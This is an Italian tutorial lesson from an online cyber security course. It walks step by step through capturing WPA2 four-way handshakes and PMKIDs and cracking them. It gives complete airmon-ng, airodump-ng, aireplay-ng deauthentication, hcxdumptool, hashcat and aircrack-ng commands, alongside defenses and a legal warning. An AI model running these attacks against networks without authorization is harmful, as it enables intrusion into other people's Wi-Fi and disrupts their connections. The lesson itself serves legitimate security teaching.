Cyber Security Academy · Lezione

Cattura e cracking dell'handshake WPA2

Catturate un handshake a 4 vie con aircrack-ng e tentate attacchi a dizionario con Hashcat.

Lezione 2 di 413 passaggi

Cattura e cracking dell'handshake WPA2 è una lezione Cyber Security Academy gratuita su CoddyKit. Questa è la lezione 2 di 4. Puoi leggere la lezione completa qui gratuitamente — poi esercitati direttamente nel browser con un editor di codice integrato e un tutor IA disponibile 24/7. Fa parte del percorso di apprendimento Cyber Security Academy, e i tuoi progressi si sincronizzano tra il web e l'app CoddyKit. Il corso Cyber Security Academy include 4 lezioni in totale.

L'handshake a quattro vie

Quando un client si connette a una rete WPA2, l'handshake a quattro vie ricava la Pairwise Transient Key (PTK) dalla PMK (derivata dalla PSK) e da nonce casuali. L'acquisizione di questo handshake consente il cracking offline della password.

Configurazione della modalità monitor

La modalità monitor consente alla scheda wireless di acquisire tutti i frame, indipendentemente dalla destinazione, ed è necessaria per l'acquisizione passiva dell'handshake. Funziona solo con schede che supportano la modalità monitor.

# Check wireless interface
iwconfig

# Enable monitor mode
sudo airmon-ng start wlan0
# Creates: wlan0mon

# Kill interfering processes first:
sudo airmon-ng check kill

Acquisizione passiva dell'handshake

Airodump-ng acquisisce i frame passivamente. Attenda che un client si connetta normalmente oppure forzi la riconnessione tramite deautenticazione. L'acquisizione dell'handshake viene mostrata nell'angolo in alto a destra dell'output di airodump.

# Scan for networks
sudo airodump-ng wlan0mon

# Target a specific AP (replace values)
sudo airodump-ng -c 6 \
  --bssid AA:BB:CC:DD:EE:FF \
  -w handshake_capture \
  wlan0mon

# Top right shows: WPA handshake: AA:BB:...

Attacco di deautenticazione

L'invio di frame di deautenticazione contraffatti forza i client connessi a disconnettersi e riconnettersi, attivando una nuova acquisizione dell'handshake. Questa tecnica genera molto rumore ed è rilevabile, oltre a richiedere che il client si trovi nel raggio d'azione.

# Send deauth frames (authorized labs only)
sudo aireplay-ng -0 5 \
  -a AA:BB:CC:DD:EE:FF \
  -c CC:DD:EE:FF:00:11 \
  wlan0mon

# -0 5 = send 5 deauth frames
# -a = AP MAC
# -c = client MAC (or omit for broadcast)

Attacco PMKID: nessun client necessario

L'attacco PMKID (hcxdumptool) acquisisce il PMKID dai frame beacon/probe senza richiedere un client connesso. È più rapido da ottenere e altrettanto attaccabile con il cracking quanto un handshake completo.

# Capture PMKID
hcxdumptool -i wlan0mon --enable_status=1 \
  -o pmkid.pcapng

# Convert for Hashcat
hcxpcapngtool -o hash.hc22000 pmkid.pcapng

# Crack with Hashcat mode 22000
hashcat -m 22000 hash.hc22000 rockyou.txt

Cracking dell'handshake con Hashcat

Converta il file di acquisizione e utilizzi Hashcat con la modalità 22000 (formato WPA2 unificato) o la modalità 2500 (legacy). Utilizzi rockyou.txt insieme alle regole per ottenere i risultati migliori.

# Convert pcap to Hashcat format
hcxpcapngtool -o hash.hc22000 handshake_capture-01.cap

# Crack with dictionary
hashcat -m 22000 hash.hc22000 rockyou.txt

# With rules
hashcat -m 22000 hash.hc22000 rockyou.txt -r best64.rule

# Brute force (short passwords)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d

Cracking con Aircrack-ng

Aircrack-ng esegue il cracking di WPA2 basato sulla CPU direttamente dal file di acquisizione. È più lento del cracking su GPU di Hashcat, ma non richiede la conversione del formato.

# Crack with aircrack-ng
aircrack-ng -w rockyou.txt handshake_capture-01.cap

# With multiple wordlists:
aircrack-ng -w wordlist1.txt,wordlist2.txt capture-01.cap

Strategia delle wordlist

Il successo del cracking delle password WPA2 dipende interamente dalla qualità della wordlist. Utilizzi: rockyou.txt come base, i set di regole di hashcat per le mutazioni, wordlist specifiche dell'azienda (nome+anno+simbolo) e liste mirate ottenute tramite OSINT.

La realtà dei tempi di cracking

Una password WPA2 casuale di almeno 20 caratteri è computazionalmente impossibile da craccare. Il cracking è pratico solo contro password brevi o basate su dizionari. Per questo la lunghezza e la casualità della password sono più importanti delle regole di complessità.

Difese

Utilizzi WPA3-SAE (immune agli attacchi a dizionario offline), oppure WPA2 con una passphrase casuale di almeno 20 caratteri, e WPA2-Enterprise con EAP-TLS (certificati anziché password).

Promemoria legale

Acquisire handshake WPA2 su reti non di propria proprietà è illegale. Tutte le tecniche qui illustrate si applicano esclusivamente alle proprie reti di test o ad ambienti di laboratorio autorizzati (ad esempio, un laboratorio domestico o un AP dedicato ai test).

Verifica rapida

Che cosa migliora l'attacco PMKID rispetto all'acquisizione standard dell'handshake?

Riepilogo: cracking di WPA2

L'acquisizione di un handshake WPA2 (o di un PMKID) trasforma il cracking Wi-Fi in un attacco a dizionario offline. Il successo dipende interamente dalla robustezza della password: quelle brevi e basate su dizionari cedono rapidamente, mentre quelle lunghe e casuali sono praticamente impossibili da craccare. Si difenda con WPA3-SAE, passphrase robuste e WPA2-Enterprise per le reti aziendali.

Gratis per iniziare

Impara Cyber Security Academy con un tutor IA — gratis

Scrivi ed esegui vero codice nel tuo browser, ricevi aiuto istantaneo da un tutor IA disponibile 24/7, e riprendi da dove hai lasciato sul web o nell'app.

Corsi
76
Lezioni
303

Domande Frequenti

La lezione «Cattura e cracking dell'handshake WPA2» è gratuita?

Sì — il testo completo di «Cattura e cracking dell'handshake WPA2» è gratuito qui sul web. Per esercitarvi in modo interattivo (un editor di codice integrato e un tutor IA 24/7) e sbloccare il resto del corso Cyber Security Academy, passa a CoddyKit PRO. Il corso Cyber Security Academy include 4 lezioni in totale.

Cosa imparerò in «Cattura e cracking dell'handshake WPA2»?

Catturate un handshake a 4 vie con aircrack-ng e tentate attacchi a dizionario con Hashcat. Eserciti Cyber Security Academy con codice pratico che esegui direttamente nel browser, e un tutor IA 24/7 risponde alle tue domande mentre lavori sulla lezione.

Ho bisogno di esperienza per iniziare Cyber Security Academy?

Non è richiesta alcuna esperienza precedente. Cyber Security Academy su CoddyKit è strutturato per principianti e studenti avanzati, quindi puoi iniziare da qui o dall'inizio e procedere al tuo ritmo. Questa è la lezione 2 di 4.

Quanto tempo richiede la lezione «Cattura e cracking dell'handshake WPA2»?

La maggior parte delle lezioni CoddyKit richiede circa 5–10 minuti. Ogni lezione è breve e interattiva, quindi fai progressi costanti e riprendi esattamente da dove hai lasciato su web e app.

Posso scrivere ed eseguire codice in questa lezione Cyber Security Academy?

Sì. Ogni lezione Cyber Security Academy include un editor di codice integrato, quindi scrivi ed esegui codice reale direttamente nel tuo browser e ricevi feedback istantaneo dall'IA — nessuna configurazione locale necessaria.

Tutte le lezioni di questo corso

  1. Protocolli di sicurezza 802.11: WEP, WPA2, WPA3
  2. Cattura e cracking dell'handshake WPA2
  3. Attacchi Evil Twin e captive portal
  4. Wi-Fi aziendale: EAP e RADIUS
← Torna a Cyber Security Academy